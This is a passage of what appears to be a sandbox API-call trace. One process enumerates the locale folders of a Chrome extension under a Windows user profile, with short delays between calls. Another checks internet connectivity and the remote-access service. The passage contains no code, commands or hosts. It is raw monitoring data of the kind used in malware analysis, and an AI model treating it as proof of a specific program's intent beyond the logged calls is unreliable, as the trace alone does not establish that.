\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:31,179 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:31,179 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:31,259 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\pt_PT\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:31,259 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xa4\xabn\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\xb0\xa4\xabn\xe0\x91\xcf\x01\xb0\xa4\xabn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xa4\xabn\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01\x8a\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:31,259 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:31,259 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:31,309 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:31,309 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:31,309 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:31,309 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:31,309 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:31,340 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\ro\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:31,340 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xa4\xabn\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\xb0\xa4\xabn\xe0\x91\xcf\x01\xb0\xa4\xabn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xa4\xabn\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01\x80\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:31,340 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:31,340 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:31,420 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\ru\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:31,420 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0+\xadn\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\xe0+\xadn\xe0\x91\xcf\x01\xe0+\xadn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xe0+\xadn\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01\xcc\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:31,420 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:31,420 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:31,500 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\sk\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:31,500 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xb3\xaen\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\x10\xb3\xaen\xe0\x91\xcf\x01\x10\xb3\xaen\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x10\xb3\xaen\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01\x93\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:31,500 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:31,500 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:31,600 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\sl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:31,600 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xb3\xaen\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\x10\xb3\xaen\xe0\x91\xcf\x01\x10\xb3\xaen\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x10\xb3\xaen\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01s\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:31,600 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:31,610 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:31,690 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\sr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:31,690 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@:\xb0n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01@:\xb0n\xe0\x91\xcf\x01@:\xb0n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00@:\xb0n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01\x17\x03\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:31,690 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:31,690 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:31,960 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\sv\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:31,970 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@:\xb0n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01@:\xb0n\xe0\x91\xcf\x01@:\xb0n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00@:\xb0n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01{\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:31,970 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:31,970 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:32,051 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\th\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:32,051 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\xc1\xb1n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01p\xc1\xb1n\xe0\x91\xcf\x01p\xc1\xb1n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00p\xc1\xb1n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01\xff\x03\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:32,051 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:32,051 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:32,111 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:32,111 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:32,111 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x00172d00 | |
| 07:44:32,111 | 1308 | OpenServiceW |
ServiceControlManager => 0x00172d00 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x00172940 | |
| 07:44:32,111 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:32,121 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:32,121 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:32,131 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\tr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:32,131 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\xc1\xb1n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\xa0H\xb3n\xe0\x91\xcf\x01\xa0H\xb3n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xa0H\xb3n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01|\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:32,131 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:32,131 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:32,211 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\uk\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:32,211 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0H\xb3n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\xa0H\xb3n\xe0\x91\xcf\x01\xa0H\xb3n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xa0H\xb3n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01\xfc\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:32,211 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:32,211 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:32,291 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\vi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:32,291 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xcf\xb4n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\xd0\xcf\xb4n\xe0\x91\xcf\x01\xd0\xcf\xb4n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xcf\xb4n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01\xa5\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:32,291 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:32,291 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00W\xb6n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\x00W\xb6n\xe0\x91\xcf\x01\x00W\xb6n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00z\x00h\x00_\x00C\x00N\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00W\xb6n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\x00W\xb6n\xe0\x91\xcf\x01\x00W\xb6n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00z\x00h\x00_\x00T\x00W\x00 |
SUCCESS | 0x00000000 | |
| 07:44:32,291 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:32,371 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\zh_CN\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:32,371 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00W\xb6n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\x00W\xb6n\xe0\x91\xcf\x01\x00W\xb6n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x00W\xb6n\xe0\x91\xcf\x01\x80\x03\xdbn\xe0\x91\xcf\x01\x80\x03\xdbn\xe0\x91\xcf\x01\x80\x03\xdbn\xe0\x91\xcf\x01G\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:32,371 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:32,371 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:32,451 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\zh_TW\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:32,451 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00W\xb6n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\x00W\xb6n\xe0\x91\xcf\x01\x00W\xb6n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x00W\xb6n\xe0\x91\xcf\x01\x80\x03\xdbn\xe0\x91\xcf\x01\x80\x03\xdbn\xe0\x91\xcf\x01\x80\x03\xdbn\xe0\x91\xcf\x01b\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:32,451 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:32,451 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:32,451 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:32,451 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:32,451 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:32,531 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\*.* |
SUCCESS | 0x0016be10 | |
| 07:44:32,531 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10f\xaah\xe0\x91\xcf\x01`(\x84y\xe0\x91\xcf\x01`(\x84y\xe0\x91\xcf\x01`(\x84y\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00bjmhmf\x00\x00\x00\x00\x00\x00\x00\x00 